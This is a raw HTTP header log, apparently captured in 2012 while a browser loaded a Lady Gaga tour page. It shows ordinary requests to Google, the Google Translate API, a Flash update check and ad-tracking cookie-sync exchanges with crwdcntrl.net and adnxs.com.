Date: Tue, 06 Nov 2012 15:40:22 GMT
Expires: Tue, 06 Nov 2012 17:40:22 GMT
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 4689
X-XSS-Protection: 1; mode=block
Age: 3861
Cache-Control: public, max-age=7200
GET /images/icons/product/translate-32.png HTTP/1.1

Host: www.google.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
Cookie: PREF=ID=18d07d2c5ecbbb08:U=205ee10a10512bfa:FF=0:TM=1350344350:LM=1350344627:S=oVTvNjgbzbFNBNUF; NID=64=UOjfkeau7k9dzmFvAsFwVqmD4s7g_bdUMaEnGOlKRSTKCit3R_G5xg2kMKTOgRf2IL0DzvimBbfFpj1mIHK6cKNk76wCsEyOlULvzyFq8aklSyHHGXGPdMpqcZCr8LfK
HTTP/1.1 200 OK

Content-Type: image/png
Last-Modified: Mon, 02 Apr 2012 02:13:37 GMT
Date: Tue, 06 Nov 2012 16:44:43 GMT
Expires: Tue, 06 Nov 2012 16:44:43 GMT
Cache-Control: private, max-age=31536000
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 1464
X-XSS-Protection: 1; mode=block
GET /5/ct=y/c=938/rand=924994231/pv=y/rt=ifr HTTP/1.1

Host: bcp.crwdcntrl.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
Cookie: cc=ctst
HTTP/1.1 200 OK

Content-Type: text/html; charset=UTF-8
Date: Tue, 06 Nov 2012 16:44:44 GMT
Cache-Control: no-cache
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
X-Server: 172.25.10.84
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: dc=1;Path=/;Domain=.crwdcntrl.net aud=&quot;ABR4nGNgYGAImGlXw8DAaHVtjng2AwcDg9cqBhBwPQihjoEpywYIbw6YUqyG8FZCKMYGhgYAyWILSg%3D%3D&quot;;Version=1;Path=/;Domain=.crwdcntrl.net;Expires=Sat, 03-Aug-2013 16:44:44 GMT;Max-Age=23328000 OAID=a1ba8a13026c54d08bd1244a8c4bf87;Path=/;Domain=.crwdcntrl.net;Expires=Sat, 03-Aug-2013 16:44:44 GMT cc=&quot;ACN4nGOQTzRMSrRINDQ2MDJLNjVJMbBISjE0MjFJtEg2SUqzMGcAgoCZdjUMYMBodW2OeDaYKdQ7zYmJgS2HgeE%2FIyMD8yogzcAIhAyMAj%2FrYBIMUAkGsESzsiR2id5ZM7Eb1SCojMMoKSMcRm3YhktHHnYJgW%2BHcEj8jMZh1E8dHJaf7sXuj%2Bafejh0bFLFJaGGXSLFdx4OV%2FE04ZBg%2B4pdgoGPO2EXpoO5E3ZiCk7UUYByGEGcZcicQmTOFgRHmesNpkGcT25jEXz8FFOwXfAwpmDBonOYgk7%2FFmEK8lUJYjPzNaYgAA9Jlw8%3D&quot;;Version=1;Path=/;Domain=.crwdcntrl.net;Expires=Sat, 03-Aug-2013 16:44:44 GMT;Max-Age=23328000
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 343
GET /5/c=938/rand=926569605/pv=y/rt=ifr HTTP/1.1

Host: bcp.crwdcntrl.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
Cookie: cc=ctst
HTTP/1.1 200 OK

Content-Type: text/html; charset=UTF-8
Date: Tue, 06 Nov 2012 16:44:44 GMT
Cache-Control: no-cache
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
X-Server: 172.25.10.85
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: dc=1;Path=/;Domain=.crwdcntrl.net aud=&quot;ABR4nGNgYGAImGlXw8DAaHVtjngbAwcDg9cqBhBwPQihjoEpywYIbw6YUqyG8FZCKMYGhgYAz5sLZQ%3D%3D&quot;;Version=1;Path=/;Domain=.crwdcntrl.net;Expires=Sat, 03-Aug-2013 16:44:44 GMT;Max-Age=23328000 OAID=a1ba8a13026c54d08bd1244a8c4bf87;Path=/;Domain=.crwdcntrl.net;Expires=Sat, 03-Aug-2013 16:44:44 GMT cc=&quot;ACN4nGOQTzRMSrRINDQ2MDJLNjVJMbBISjE0MjFJtEg2SUqzMGcAgoCZdjUMYMBodW2OeBuYKdQ7zYmJgS2HgeE%2FIyMD8yogzcAIhAyMAj%2FrYBIMUAkGsESzsiR2id5ZM7Eb1SCojMMoKSMcRm3YhktHHnYJgW%2BHcEj8jMZh1E8dHJaf7sXuj%2Bafejh0bFLFJaGGXSLFdx4OV%2FE04ZBg%2B4pdgoGPO2EXpoO5E3ZiCk7UUYByGEGcZcicQmTOFgRHmesNpkGcT25jEXz8FFOwXfAwpmDBonOYgk7%2FFmEK8lUJYjPzNaYgAFtUlyo%3D&quot;;Version=1;Path=/;Domain=.crwdcntrl.net;Expires=Sat, 03-Aug-2013 16:44:44 GMT;Max-Age=23328000
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 342
GET /5/ct=y/c=938/rand=202036522/pv=y/rt=ifr HTTP/1.1

Host: bcp.crwdcntrl.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
Cookie: cc=ctst
HTTP/1.1 200 OK

Content-Type: text/html; charset=UTF-8
Date: Tue, 06 Nov 2012 16:44:44 GMT
Cache-Control: no-cache
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
X-Server: 172.25.10.137
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: dc=1;Path=/;Domain=.crwdcntrl.net aud=&quot;ABR4nGNgYGAImGlXw8DAaHVtjngQAwcDg9cqBhBwPQihjoEpywYIbw6EWgmmFKshPMYGhgYAxd0LMQ%3D%3D&quot;;Version=1;Path=/;Domain=.crwdcntrl.net;Expires=Sat, 03-Aug-2013 16:44:44 GMT;Max-Age=23328000 OAID=a1ba8a13026c54d08bd1244a8c4bf87;Path=/;Domain=.crwdcntrl.net;Expires=Sat, 03-Aug-2013 16:44:44 GMT cc=&quot;ACN4nGOQTzRMSrRINDQ2MDJLNjVJMbBISjE0MjFJtEg2SUqzMGcAgoCZdjUMYMBodW2OeBCYKdSsLMnEwJbDwPCfkYGBeRWQBilgYGAS%2BFmHXaJ3mhNMghEqwQiRmDUTu0SDoDJ2o5qljHDYsWEbLh15OJz77RAuf0TjMOqnDg7LT%2Fdi90fzTz0cOjap4pJQwy6R4jsPh6t4mnBIsH3FLsHAx52wC9PB3Ak7MQUn6ihAOYwgzjJkTiEyZwuCo8z1BtMgzie3sQg%2Bfoop2C54GFOwYNE5TEGnf4swBfmqBLGZ%2BRpTEADJlJcI&quot;;Version=1;Path=/;Domain=.crwdcntrl.net;Expires=Sat, 03-Aug-2013 16:44:44 GMT;Max-Age=23328000
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 260
GET /get/flashplayer/update/current/xml/version_en_win_pl.xml HTTP/1.1

Host: fpdownload2.macromedia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
HTTP/1.1 200 OK

Content-Type: text/xml
Server: Apache
Last-Modified: Wed, 03 Oct 2012 19:48:11 GMT
Etag: &quot;289dff-26c-4cb2ceb2654c0&quot;
Accept-Ranges: bytes
Content-Length: 620
Date: Tue, 06 Nov 2012 16:44:46 GMT
Connection: keep-alive
GET /translate_a/l?client=te&alpha=true&hl=en&cb=_callbacks_._0h9791nqb HTTP/1.1

Host: translate.googleapis.com
GET /translate_a/l?client=te&amp;alpha=true&amp;hl=en&amp;cb=_callbacks_._0h9791nqb HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: text/javascript; charset=UTF-8
Date: Tue, 06 Nov 2012 16:44:47 GMT
Expires: Tue, 06 Nov 2012 16:44:47 GMT
Cache-Control: private, max-age=86400
Content-Language: en
X-Content-Type-Options: nosniff
Content-Disposition: attachment
Content-Encoding: gzip
Server: HTTP server (unknown)
Content-Length: 652
X-XSS-Protection: 1; mode=block
GET /px?Yz0xNjQ0JnB4aWQ9MjY5MTgsMjY4NDQsMjY5MjgsMjY4NzA%3D HTTP/1.1

Host: bcp.crwdcntrl.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bcp.crwdcntrl.net/5/ct=y/c=938/rand=924994231/pv=y/rt=ifr
Cookie: cc=&quot;ACN4nGOQTzRMSrRINDQ2MDJLNjVJMbBISjE0MjFJtEg2SUqzMGcAgoCZdjUMYMBodW2OeDaYKdQ7zYmJgS2HgeE%2FIyMD8yogzcAIhAyMAj%2FrYBIMUAkGsESzsiR2id5ZM7Eb1SCojMMoKSMcRm3YhktHHnYJgW%2BHcEj8jMZh1E8dHJaf7sXuj%2Bafejh0bFLFJaGGXSLFdx4OV%2FE04ZBg%2B4pdgoGPO2EXpoO5E3ZiCk7UUYByGEGcZcicQmTOFgRHmesNpkGcT25jEXz8FFOwXfAwpmDBonOYgk7%2FFmEK8lUJYjPzNaYgAA9Jlw8%3D&quot;; dc=1; aud=&quot;ABR4nGNgYGAImGlXw8DAaHVtjng2AwcDg9cqBhBwPQihjoEpywYIbw6YUqyG8FZCKMYGhgYAyWILSg%3D%3D&quot;; OAID=a1ba8a13026c54d08bd1244a8c4bf87
HTTP/1.1 200 OK

Content-Type: text/html; charset=UTF-8
Date: Tue, 06 Nov 2012 16:44:48 GMT
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
X-Server: 172.25.11.231
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 247
GET /getuid?http%3A%2F%2Fbcp.crwdcntrl.net%2Fmap%2Fc=281%2Frand=360279168%2Ftpid%3D%24UID%2Ftp%3DANXS HTTP/1.1

Host: ib.adnxs.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bcp.crwdcntrl.net/5/ct=y/c=938/rand=924994231/pv=y/rt=ifr
Cookie: uuid2=5858721859426781856; anj=Kfu=8fG7]PCxrx)0s]#%2L_'x%SEV/hnJip8Ep.I(G*axlrk5.$WN_]Dl5M7G(nDS'6pnU
HTTP/1.1 302 Moved

Content-Type: text/html; charset=ISO-8859-1
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref=&quot;http://cdn.adnxs.com/w3c/policy/p3p.xml&quot;, CP=&quot;NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE&quot;
X-XSS-Protection: 0
Set-Cookie: uuid2=5858721859426781856; path=/; expires=Mon, 04-Feb-2013 16:44:48 GMT; domain=.adnxs.com; HttpOnly sess=1; path=/; expires=Wed, 07-Nov-2012 16:44:48 GMT; domain=.adnxs.com; HttpOnly
Location: http://bcp.crwdcntrl.net/map/c=281/rand=360279168/tpid=5858721859426781856/tp=ANXS
Date: Tue, 06 Nov 2012 16:44:48 GMT
Content-Length: 0
GET /getuid?http%3A%2F%2Fbcp.crwdcntrl.net%2Fmap%2Fc=281%2Frand=723093028%2Ftpid%3D%24UID%2Ftp%3DANXS HTTP/1.1

Host: ib.adnxs.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bcp.crwdcntrl.net/5/ct=y/c=938/rand=202036522/pv=y/rt=ifr
Cookie: uuid2=5858721859426781856; anj=Kfu=8fG7]PCxrx)0s]#%2L_'x%SEV/hnJip8Ep.I(G*axlrk5.$WN_]Dl5M7G(nDS'6pnU
HTTP/1.1 302 Moved

Content-Type: text/html; charset=ISO-8859-1
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref=&quot;http://cdn.adnxs.com/w3c/policy/p3p.xml&quot;, CP=&quot;NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE&quot;
X-XSS-Protection: 0
Set-Cookie: uuid2=5858721859426781856; path=/; expires=Mon, 04-Feb-2013 16:44:48 GMT; domain=.adnxs.com; HttpOnly sess=1; path=/; expires=Wed, 07-Nov-2012 16:44:48 GMT; domain=.adnxs.com; HttpOnly
Location: http://bcp.crwdcntrl.net/map/c=281/rand=723093028/tpid=5858721859426781856/tp=ANXS
Date: Tue, 06 Nov 2012 16:44:48 GMT
Content-Length: 0
GET /getuid?http%3A%2F%2Fbcp.crwdcntrl.net%2Fmap%2Fc=281%2Frand=812845887%2Ftpid%3D%24UID%2Ftp%3DANXS HTTP/1.1

Host: ib.adnxs.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bcp.crwdcntrl.net/5/c=938/rand=926569605/pv=y/rt=ifr
Cookie: uuid2=5858721859426781856; anj=Kfu=8fG7]PCxrx)0s]#%2L_'x%SEV/hnJip8Ep.I(G*axlrk5.$WN_]Dl5M7G(nDS'6pnU
HTTP/1.1 302 Moved

Content-Type: text/html; charset=ISO-8859-1
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref=&quot;http://cdn.adnxs.com/w3c/policy/p3p.xml&quot;, CP=&quot;NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE&quot;
X-XSS-Protection: 0
Set-Cookie: uuid2=5858721859426781856; path=/; expires=Mon, 04-Feb-2013 16:44:48 GMT; domain=.adnxs.com; HttpOnly sess=1; path=/; expires=Wed, 07-Nov-2012 16:44:48 GMT; domain=.adnxs.com; HttpOnly
Location: http://bcp.crwdcntrl.net/map/c=281/rand=812845887/tpid=5858721859426781856/tp=ANXS
Date: Tue, 06 Nov 2012 16:44:48 GMT
Content-Length: 0
GET /seg?add=412049&t=1 HTTP/1.1

Host: ib.adnxs.com
GET /seg?add=412049&amp;t=1 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bcp.crwdcntrl.net/px?Yz0xNjQ0JnB4aWQ9MjY5MTgsMjY4NDQsMjY5MjgsMjY4NzA%3D
Cookie: uuid2=5858721859426781856; anj=Kfu=8fG7]PCxrx)0s]#%2L_'x%SEV/hnJip8Ep.I(G*axlrk5.$WN_]Dl5M7G(nDS'6pnU
HTTP/1.1 200 OK

Content-Type: text/javascript
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref=&quot;http://cdn.adnxs.com/w3c/policy/p3p.xml&quot;, CP=&quot;NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE&quot;
X-XSS-Protection: 0
Set-Cookie: uuid2=5858721859426781856; path=/; expires=Mon, 04-Feb-2013 16:44:48 GMT; domain=.adnxs.com; HttpOnly sess=1; path=/; expires=Wed, 07-Nov-2012 16:44:48 GMT; domain=.adnxs.com; HttpOnly anj=Kfu=8fG3x=Cxrx)0s]#%2L_'x%SEV/hnKu98Ep.Ii!9ZZKnmJW/AstWS0R!o)Bfx+Q7WRpKt1Z)V0K9Z; path=/; expires=Mon, 04-Feb-2013 16:44:48 GMT; domain=.adnxs.com; HttpOnly
Date: Tue, 06 Nov 2012 16:44:48 GMT
Content-Length: 217
GET /map/c=281/rand=360279168/tpid=5858721859426781856/tp=ANXS HTTP/1.1

Host: bcp.crwdcntrl.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bcp.crwdcntrl.net/5/ct=y/c=938/rand=924994231/pv=y/rt=ifr
Cookie: cc=&quot;ACN4nGOQTzRMSrRINDQ2MDJLNjVJMbBISjE0MjFJtEg2SUqzMGcAgoCZdjUMYMBodW2OeBCYKdSsLMnEwJbDwPCfkYGBeRWQBilgYGAS%2BFmHXaJ3mhNMghEqwQiRmDUTu0SDoDJ2o5qljHDYsWEbLh15OJz77RAuf0TjMOqnDg7LT%2Fdi90fzTz0cOjap4pJQwy6R4jsPh6t4mnBIsH3FLsHAx52wC9PB3Ak7MQUn6ihAOYwgzjJkTiEyZwuCo8z1BtMgzie3sQg%2Bfoop2C54GFOwYNE5TEGnf4swBfmqBLGZ%2BRpTEADJlJcI&quot;; dc=1; aud=&quot;ABR4nGNgYGAImGlXw8DAaHVtjngQAwcDg9cqBhBwPQihjoEpywYIbw6EWgmmFKshPMYGhgYAxd0LMQ%3D%3D&quot;; OAID=a1ba8a13026c54d08bd1244a8c4bf87
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Tue, 06 Nov 2012 16:44:48 GMT
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
X-Server: 172.25.10.140
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 65
GET /map/c=281/rand=723093028/tpid=5858721859426781856/tp=ANXS HTTP/1.1

Host: bcp.crwdcntrl.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bcp.crwdcntrl.net/5/ct=y/c=938/rand=202036522/pv=y/rt=ifr
Cookie: cc=&quot;ACN4nGOQTzRMSrRINDQ2MDJLNjVJMbBISjE0MjFJtEg2SUqzMGcAgoCZdjUMYMBodW2OeBCYKdSsLMnEwJbDwPCfkYGBeRWQBilgYGAS%2BFmHXaJ3mhNMghEqwQiRmDUTu0SDoDJ2o5qljHDYsWEbLh15OJz77RAuf0TjMOqnDg7LT%2Fdi90fzTz0cOjap4pJQwy6R4jsPh6t4mnBIsH3FLsHAx52wC9PB3Ak7MQUn6ihAOYwgzjJkTiEyZwuCo8z1BtMgzie3sQg%2Bfoop2C54GFOwYNE5TEGnf4swBfmqBLGZ%2BRpTEADJlJcI&quot;; dc=1; aud=&quot;ABR4nGNgYGAImGlXw8DAaHVtjngQAwcDg9cqBhBwPQihjoEpywYIbw6EWgmmFKshPMYGhgYAxd0LMQ%3D%3D&quot;; OAID=a1ba8a13026c54d08bd1244a8c4bf87
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Tue, 06 Nov 2012 16:44:48 GMT
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
X-Server: 172.25.10.102
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 65
GET /map/c=281/rand=812845887/tpid=5858721859426781856/tp=ANXS HTTP/1.1

Host: bcp.crwdcntrl.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bcp.crwdcntrl.net/5/c=938/rand=926569605/pv=y/rt=ifr
Cookie: cc=&quot;ACN4nGOQTzRMSrRINDQ2MDJLNjVJMbBISjE0MjFJtEg2SUqzMGcAgoCZdjUMYMBodW2OeBCYKdSsLMnEwJbDwPCfkYGBeRWQBilgYGAS%2BFmHXaJ3mhNMghEqwQiRmDUTu0SDoDJ2o5qljHDYsWEbLh15OJz77RAuf0TjMOqnDg7LT%2Fdi90fzTz0cOjap4pJQwy6R4jsPh6t4mnBIsH3FLsHAx52wC9PB3Ak7MQUn6ihAOYwgzjJkTiEyZwuCo8z1BtMgzie3sQg%2Bfoop2C54GFOwYNE5TEGnf4swBfmqBLGZ%2BRpTEADJlJcI&quot;; dc=1; aud=&quot;ABR4nGNgYGAImGlXw8DAaHVtjngQAwcDg9cqBhBwPQihjoEpywYIbw6EWgmmFKshPMYGhgYAxd0LMQ%3D%3D&quot;; OAID=a1ba8a13026c54d08bd1244a8c4bf87
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Tue, 06 Nov 2012 16:44:49 GMT
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
X-Server: 172.25.10.102
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 65
GET /translate_a/l?client=te&alpha=true&hl=en&cb=_callbacks_._0h9791olb HTTP/1.1

Host: translate.googleapis.com
GET /translate_a/l?client=te&amp;alpha=true&amp;hl=en&amp;cb=_callbacks_._0h9791olb HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: text/javascript; charset=UTF-8
Date: Tue, 06 Nov 2012 16:44:48 GMT
Expires: Tue, 06 Nov 2012 16:44:48 GMT
Cache-Control: private, max-age=86400
Content-Language: en
X-Content-Type-Options: nosniff
Content-Disposition: attachment
Content-Encoding: gzip
Server: HTTP server (unknown)
Content-Length: 652
X-XSS-Protection: 1; mode=block
GET /seg?add=412001&t=1 HTTP/1.1

Host: ib.adnxs.com
GET /seg?add=412001&amp;t=1 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bcp.crwdcntrl.net/px?Yz0xNjQ0JnB4aWQ9MjY5MTgsMjY4NDQsMjY5MjgsMjY4NzA%3D
Cookie: uuid2=5858721859426781856; anj=Kfu=8fG7]PCxrx)0s]#%2L_'x%SEV/hnJip8Ep.I(G*axlrk5.$WN_]Dl5M7G(nDS'6pnU; sess=1
HTTP/1.1 200 OK

Content-Type: text/javascript
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref=&quot;http://cdn.adnxs.com/w3c/policy/p3p.xml&quot;, CP=&quot;NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE&quot;
X-XSS-Protection: 0
Set-Cookie: uuid2=5858721859426781856; path=/; expires=Mon, 04-Feb-2013 16:44:49 GMT; domain=.adnxs.com; HttpOnly sess=1; path=/; expires=Wed, 07-Nov-2012 16:44:49 GMT; domain=.adnxs.com; HttpOnly anj=Kfu=8fG3x=Cxrx)0s]#%2L_'x%SEV/hnKu98Ep.Ii!9ZZKnmJW/AstWS0R!o)Bfx+9w/dJ7L)iRU3Nu$; path=/; expires=Mon, 04-Feb-2013 16:44:49 GMT; domain=.adnxs.com; HttpOnly
Date: Tue, 06 Nov 2012 16:44:49 GMT
Content-Length: 217
GET /px?Yz0xNjQ0JnB4aWQ9MjY5MTgsMjY4NDQsMjY5MjgsMjY4NzA%3D HTTP/1.1

Host: bcp.crwdcntrl.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bcp.crwdcntrl.net/5/c=938/rand=926569605/pv=y/rt=ifr
Cookie: cc=&quot;ACN4nGOQTzRMSrRINDQ2MDJLNjVJMbBISjE0MjFJtEg2SUqzMGcAgoCZdjUMYMBodW2OeBuYKdQ7zYmJgS2HgeE%2FIyMD8yogzcAIhAyMAj%2FrYBIMUAkGsESzsiR2id5ZM7Eb1SCojMMoKSMcRm3YhktHHnYJgW%2BHcEj8jMZh1E8dHJaf7sXuj%2Bafejh0bFLFJaGGXSLFdx4OV%2FE04ZBg%2B4pdgoGPO2EXpoO5E3ZiCk7UUYByGEGcZcicQmTOFgRHmesNpkGcT25jEXz8FFOwXfAwpmDBonOYgk7%2FFmEK8lUJYjPzNaYgAFtUlyo%3D&quot;; dc=1; aud=&quot;ABR4nGNgYGAImGlXw8DAaHVtjngbAwcDg9cqBhBwPQihjoEpywYIbw6YUqyG8FZCKMYGhgYAz5sLZQ%3D%3D&quot;; OAID=a1ba8a13026c54d08bd1244a8c4bf87
HTTP/1.1 200 OK

Content-Type: text/html; charset=UTF-8
Date: Tue, 06 Nov 2012 16:44:49 GMT
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
X-Server: 172.25.11.107
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 247
GET /seg?add=412118&t=1 HTTP/1.1

Host: ib.adnxs.com
GET /seg?add=412118&amp;t=1 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
